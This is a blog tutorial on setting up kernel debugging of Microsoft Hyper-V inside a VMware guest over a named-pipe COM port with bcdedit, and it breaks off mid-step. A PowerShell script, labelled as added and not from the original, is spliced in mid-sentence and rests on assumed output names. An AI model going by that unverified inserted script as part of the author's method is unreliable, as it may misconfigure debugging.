Hyper-V Internals (Gerhart X, http://www.blogger.com/profile/13830158514949395797) - Hyper-V debugging for beginners. 2nd edition. Published 2021-01-11, updated 2021-01-14.<span id="docs-internal-guid-dca93936-7fff-eca8-9463-dd972f0b5dc5"><p dir="ltr">The first version of this article was published 7 years ago in Russian and 5 years ago in English (with some modifications). Hyper-V has expanded tremendously since then. Some time ago I spent a while on Hyper-V memory investigation; now I want to see what has changed since the 1<span style="font-size: 0.6em; vertical-align: super;">st</span> version of the article was published, and which tools other researchers are using now.</p><p dir="ltr">Early Hyper-V was available only for the Windows Server and Hyper-V Server (a limited version of Windows Server) operating system families. Now many Windows components, including desktop ones, are based on Hyper-V.</p><p dir="ltr" style="text-align: center;"><img height="282" src="https://lh6.googleusercontent.com/SxV3GgKu2cqU_jb-d8G0LB6h-xeN8jcL2LUFDxlERcXg44yuXH4PUD_t8z59qJAXD93Q2jddQp7EFd5OZ6bSG78eRi1NTxXeUtJEmNFuiXsbDQs0IjNo41LenFiZ_cWvsCjxjjaTQbZv5y4AYg" width="331" /></p><p dir="ltr">Therefore, I decided to write an up-to-date version of that article. Some of the techniques are outdated, many new tools have been developed since, and it is interesting to see how we can debug Hyper-V using these tools. This article describes Hyper-V kernel mode debugging.</p><p dir="ltr"><span>When the 1<span style="font-size: 0.6em; vertical-align: super;">st</span> edition of the article was written, only VMware Workstation supported nested virtualization. 
Now nested virtualization is a standard feature of virtualization software, and it is supported by VMware, Hyper-V (Intel only; AMD support is still in beta and available from Windows 10 build 19636 - </span><a href="https://techcommunity.microsoft.com/t5/virtualization/amd-nested-virtualization-support/ba-p/1434841">https://techcommunity.microsoft.com/t5/virtualization/amd-nested-virtualization-support/ba-p/1434841</a><span>), VirtualBox and QEMU.</span></p><p dir="ltr">VirtualBox 6.1.16 doesn't support SLAT on Intel CPUs, therefore it can't be used as a Hyper-V debugging environment at the moment.</p><p dir="ltr"><img height="94" src="https://lh4.googleusercontent.com/Ay4ZrPulvuhszEEOg0AAH2wGjT98c1W1YmsFM3uN_aPmYukEv0r4WgSGXOYAsQmtvn_M29FhXuHNO9QcQ7hyKTgWvj0De8g72Zq_DSFsFxRpY5CoKw6VE7X4y0bO0gtWhTwwnqaOiCsY-bcYxw" width="321" /></p><p dir="ltr">Microsoft is developing Hyper-V for Linux hosts. So far only some patches have been published for Linux - <a href="https://lwn.net/Articles/838146/">https://lwn.net/Articles/838146/</a><span>. 
It will be interesting to see it in a working environment in the future.</span></p><h1 dir="ltr">1. Terms and definitions</h1><p dir="ltr">− <b>The hypervisor (hypervisor module)</b> – the Hyper-V component whose binary depends on the processor manufacturer (hvix64.exe for Intel, hvax64.exe for AMD, hvaa64.exe for ARM). This article discusses Hyper-V on Intel family processors.</p><p dir="ltr">− <b>Hypercall</b> – a call to a given function in the hypervisor using the vmcall\vmmcall\hvc instructions.</p><p dir="ltr">− <b>Root partition</b> – the partition running Windows Server 2019\Windows 10 with the Hyper-V component enabled.</p><p dir="ltr">− <b>VMCS (virtual-machine control structure)</b> – the structure that defines the logic of the hypervisor.</p><p dir="ltr">− <b>VMX root</b> – the mode in which the hypervisor runs.</p><p dir="ltr">− <b>VMX non-root</b> – the mode in which the guest operating system and its application software run.</p><p dir="ltr">− <b>VM exit</b> – the transition from <b>VMX non-root</b> into <b>VMX root</b>. It occurs on execution of instructions or on conditions specified in the VMCS, and is implemented directly in the processor logic.</p><h1 dir="ltr">2. Debugging</h1><h2 dir="ltr">2.1. Com-port debugging</h2><p dir="ltr">Hyper-V consists of several components; a brief description can be found at <a href="https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/reference/hyper-v-architecture">https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/reference/hyper-v-architecture</a>. To debug Hyper-V components you can use WinDBG or another user-mode or kernel-mode debugger; however, to connect to the hypervisor you have to perform a few extra steps to configure the root partition.</p><p dir="ltr"><span>For debugging the hypervisor, Microsoft developed a special WinDBG extension, hvexts.dll, which unfortunately is not included in the debugger distribution and is available only to partners (because that extension needs private symbols for the hypervisor module, which are not available). 
Also, the </span><b>winxp</b><span> folder inside the WinDBG folder contains the extension nvkd.dll, which is intended for debugging Hyper-V virtual switch extensions.</span></p><p dir="ltr">The WinDBG help file describes debugging the hypervisor over a null-modem cable through the com-port (search for "Debugging Hyper-V via a Null-modem Cable Connection" in debugger.chm), which implies two physical machines. However, the hypervisor can also be debugged if you run it inside any virtualization software that supports it. Below we use VMware Workstation: install Windows Server 2019 as the guest OS and enable the Hyper-V component.</p><p dir="ltr"><span>If you connect directly to the VMware com-port, you get errors during communication. 
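Before the step-by-step Actions list that follows, here is an added PowerShell example (not from the original article) that applies the same root-partition bcdedit configuration in one go and then reads the settings back to verify them, which is the check a practitioner wants before rebooting into the debugger. It assumes an elevated PowerShell prompt inside the Windows Server 2019 guest; the helper names Invoke-Bcdedit and ConvertFrom-BcdeditOutput are invented here, and the element names it checks in bcdedit's output (debugtype/debugport/baudrate, their hypervisor-prefixed variants, hypervisordebug, dbgtransport and debug) are assumed from bcdedit's own output format rather than taken from the article.

```powershell
# Added example, not from the original article: apply the root-partition
# bcdedit configuration from the "Actions" list and read it back to verify it.
# Run from an elevated PowerShell prompt inside the Windows Server 2019 guest.
# DebugPort/BaudRate default to the article's values (COM1, 115200).
param(
    [int]$DebugPort = 1,
    [int]$BaudRate  = 115200,
    [switch]$BootDebug   # also run "bcdedit /set bootdebug on" (the "Additionally" step)
)

# Hypothetical helper: run bcdedit with an argument list and fail loudly on error.
function Invoke-Bcdedit {
    param([string[]]$Arguments)
    $output = & bcdedit.exe @Arguments
    if ($LASTEXITCODE -ne 0) {
        throw "bcdedit $($Arguments -join ' ') failed (exit $LASTEXITCODE): $($output -join ' ')"
    }
    return $output
}

# Hypothetical helper: turn bcdedit's "name   value" lines into a hashtable
# keyed by the lower-cased element name.
function ConvertFrom-BcdeditOutput {
    param([string[]]$Lines)
    $table = @{}
    foreach ($line in $Lines) {
        if ($line -match '^(\S+)\s+(.+?)\s*$') {
            $table[$Matches[1].ToLower()] = $Matches[2]
        }
    }
    return $table
}

# 1. Hypervisor debugging options: serial transport for the hypervisor itself.
Invoke-Bcdedit @('/hypervisorsettings', 'serial', "DEBUGPORT:$DebugPort", "BAUDRATE:$BaudRate") | Out-Null
Invoke-Bcdedit @('/set', 'hypervisordebug', 'on') | Out-Null

# 2. Root OS debugging over the same com-port; kdhvcom.dll is the transport that
#    shares one serial line between the hypervisor and the root OS kernel debugger.
Invoke-Bcdedit @('/set', 'dbgtransport', 'kdhvcom.dll') | Out-Null
Invoke-Bcdedit @('/dbgsettings', 'serial', "DEBUGPORT:$DebugPort", "BAUDRATE:$BaudRate") | Out-Null
Invoke-Bcdedit @('/debug', 'on') | Out-Null

# Additionally: boot debugger, needed to follow the hypervisor loading process.
if ($BootDebug) {
    Invoke-Bcdedit @('/set', 'bootdebug', 'on') | Out-Null
}

# Verification: read the three views back and compare with what was requested.
# Element names are assumed from bcdedit's output format: /hypervisorsettings
# prints hypervisordebugtype/hypervisordebugport/hypervisorbaudrate, /dbgsettings
# prints debugtype/debugport/baudrate, and /enum {current} lists the
# hypervisordebug, dbgtransport and debug elements.
$hv  = ConvertFrom-BcdeditOutput (Invoke-Bcdedit @('/hypervisorsettings'))
$os  = ConvertFrom-BcdeditOutput (Invoke-Bcdedit @('/dbgsettings'))
$cur = ConvertFrom-BcdeditOutput (Invoke-Bcdedit @('/enum', '{current}'))

$checks = @(
    @{ Table = $hv;  Key = 'hypervisordebugtype'; Expected = 'Serial'      },
    @{ Table = $hv;  Key = 'hypervisordebugport'; Expected = "$DebugPort"  },
    @{ Table = $hv;  Key = 'hypervisorbaudrate';  Expected = "$BaudRate"   },
    @{ Table = $os;  Key = 'debugtype';           Expected = 'Serial'      },
    @{ Table = $os;  Key = 'debugport';           Expected = "$DebugPort"  },
    @{ Table = $os;  Key = 'baudrate';            Expected = "$BaudRate"   },
    @{ Table = $cur; Key = 'hypervisordebug';     Expected = 'Yes'         },
    @{ Table = $cur; Key = 'dbgtransport';        Expected = 'kdhvcom.dll' },
    @{ Table = $cur; Key = 'debug';               Expected = 'Yes'         }
)

$failed = 0
foreach ($c in $checks) {
    $actual = $c.Table[$c.Key]
    if ($actual -ieq $c.Expected) {
        Write-Host ("OK    {0,-22} {1}" -f $c.Key, $actual)
    } else {
        Write-Host ("WRONG {0,-22} got '{1}', expected '{2}'" -f $c.Key, $actual, $c.Expected)
        $failed++
    }
}
if ($failed -gt 0) { exit 1 }
Write-Host "Root partition is configured; the settings take effect at the next boot of the guest."
```

The script deliberately reads the configuration back instead of trusting the return codes: a typo in the transport name or a port number that does not match the VMware serial port is the usual reason the debugger never attaches, and it is cheaper to catch that here than after a reboot. The BootDebug switch corresponds to the optional bootdebug setting the article adds for studying hypervisor loading.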
Use some free com-port utility for connection stabilization (I used com-port emulator Free Virtual Serial Ports utility from the HHD-software (</span><a href="https://freevirtualserialports.com" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://freevirtualserialports.com</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) – version 3.32. Version 4.12 give errors, when </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmdemux</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is tried to open COM-port)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Actions:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" 
style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Create com-port for VMware virtual machine (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hardware</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Add</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: 
baseline;">Serial port</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Use named pipe</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">). Enter \\.\pipe\com_1</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 206px; overflow: hidden; width: 495px;"><img height="206" src="https://lh5.googleusercontent.com/63E7FRD2_mOMO6JX7YXlTkto0S71t_9a7kpUs_IbaQ1QrBOpYZ4z-I-rHOY6hcqXtDlJIIkK4J8jGEjApMVAVB6e7RuNotebrRac0tAh2J-Taw9Qrw5cnRq0SI26SLDZ0nbHohTHlbKKMXW1LA" style="margin-left: 0px; margin-top: 0px;" width="495" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2.</span><span 
face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To perform root-partition commands to configure debugging hypervisor and the OS:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hypervisor debugging options</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /hypervisorsettings serial DEBUGPORT:1 BAUDRATE:115200</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: 
baseline;">bcdedit /set hypervisordebug on </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Root OS debugging (over the same COM port):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set dbgtransport kdhvcom.dll </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /dbgsettings serial DEBUGPORT:1 BAUDRATE:115200</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /debug on</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: 
justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Additionally:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /set bootdebug on </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(needed to study the hypervisor loading process in the next part of the article)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The standard kernel debug transport modules are:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: 
transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kdcom.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kdhvcom.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kd1394.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kdhv1394.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kdusb.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: 
baseline;">Kdnet.dll (plus the vendor-specific network card modules, such as kd_02_8086.dll)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kd.dll</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We use kdhvcom.dll in our case.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 184px; overflow: hidden; width: 312px;"><img height="184" 
src="https://lh6.googleusercontent.com/14D-UaH6llQ_y_zAyu0dQVeUdTzrOzxOmzIkW8X0Z0KSJqj16TfJp2eUvHuyXcWg6ciUgNiwnQotOBXhV9D9s8JIbcB-eBnG7kZbxjK-fTR2S7WLiQRJ3QvfPHODXA8CNGkd1APnXtfUIM_hcQ" style="margin-left: 0px; margin-top: 0px;" width="312" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Times New Roman'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Restart</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Windows Server 2019. 
The OS will stop at boot and wait for a debugger connection.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Times New Roman'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Open</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HHD Software Free Virtual Serial Ports, select </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">File, </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> Create Pipe Port</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; 
font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. In the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Pipe name </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">field, specify the same value as for the virtual machine: </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">\\.\pipe\com_1</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. The 
</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Create pipe</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> option must be left unchecked (the tool should connect to the existing pipe, not create one).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">OK.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 212px; overflow: hidden; width: 203px;"><img height="212" src="https://lh6.googleusercontent.com/5aLKQt6v4pHz_bHpO-P4HEXeS5HeCNelrsbvGivmpYtA9t-0bVgoqizzYz-DJR73EcsNIM5n6drFIl2VXaVxXf1Z5jtPd0VFbrXfJRR_nbVvmKB7-ry1RhKixTMS05bDtVQ90m2X7Ynxy89qug" style="margin-left: 0px; margin-top: 0px;" width="203" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; 
margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Do this after the VM has been started; otherwise you will get an error saying that the pipe does not exist (VMware creates the pipe only once the VM is running).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 70px; overflow: hidden; width: 369px;"><img height="70" src="https://lh5.googleusercontent.com/dFZ_zBxRdkWcMRiLZmw1O9oOcsNEJxmdc4qk-0WVfstEhD5BYuCloLYkAYxixidHFDQD3iI_Y-9O1IagKUvAvV5_YgXITL1N9yq9VRrwYuH-LrY7umt4x7yNOkuM9CpjdHPGJ18FcwGxl1HmNQ" style="margin-left: 0px; margin-top: 0px;" width="369" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: 